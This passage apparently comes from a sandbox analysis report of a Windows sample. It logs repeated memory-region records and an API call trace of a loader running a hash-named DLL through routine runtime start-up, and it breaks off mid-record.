"pagefile_0x00000000001b0000" filename = "" Region: id = 18702 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18703 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18704 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18705 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18706 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18707 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18708 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 227 os_tid = 0x98c [0268.415] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.415] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0268.416] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.416] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0268.416] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0268.418] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.418] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0268.418] GetProcessHeap () returned 0x540000 [0268.418] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.418] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0268.419] GetLastError () returned 0x7e [0268.419] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0268.419] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0268.419] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c8) returned 0x54c320 [0268.419] SetLastError (dwErrCode=0x7e) [0268.419] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1200) returned 0x553470 [0268.422] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0268.422] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0268.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0268.422] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0268.422] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" [0268.422] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" [0268.422] GetACP () returned 0x4e4 [0268.422] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228) returned 0x545380 [0268.422] IsValidCodePage (CodePage=0x4e4) returned 1 [0268.422] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0268.422] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0268.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0268.423] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0268.423] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.423] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0268.423] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.423] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0268.423] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0268.423] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0268.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0268.423] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.423] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0268.423] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0268.423] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0268.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5518f0 [0268.424] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x180) returned 0x549aa0 [0268.424] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0268.424] GetLastError () returned 0x0 [0268.424] SetLastError (dwErrCode=0x0) [0268.424] GetEnvironmentStringsW () returned 0x554680* [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9cc) returned 0x555060 [0268.424] FreeEnvironmentStringsW (penv=0x554680) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x118) returned 0x54a350 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x550db0 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x5c) returned 0x540780 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x62) returned 0x544c00 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x78) returned 0x54c6f0 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x62) returned 0x545a40 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x28) returned 0x54b380 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x550360 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1a) returned 0x54b6e0 [0268.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3a) returned 0x550180 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x62) returned 0x544970 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x54c770 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x544c70 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1c) returned 0x54b440 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd2) returned 0x545cd0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x7c) returned 0x544000 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3a) returned 0x5504a0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x90) returned 0x543c30 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x54b710 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x5449e0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x545ab0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x550310 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x5492c0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x54ffa0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd6) returned 0x545610 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x5420e0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x54b470 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2c) returned 0x542120 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x54) returned 0x549440 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x5494a0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x54b740 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x42) returned 0x550810 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2c) returned 0x542160 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x44) returned 0x5504f0 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x54b890 [0268.425] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555060 | out: hHeap=0x540000) returned 1 [0268.425] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1000) returned 0x554680 [0268.426] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0268.426] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0268.426] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" [0268.426] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x549770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0268.427] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0268.430] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.431] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0268.431] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.431] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0268.431] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0268.432] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.432] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0268.433] GetProcessHeap () returned 0x540000 [0268.433] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.433] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0268.434] GetLastError () returned 0x0 [0268.434] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0268.434] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0268.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c8) returned 0x555b10 [0268.435] SetLastError (dwErrCode=0x0) [0268.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1200) returned 0x555ee0 [0268.439] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, 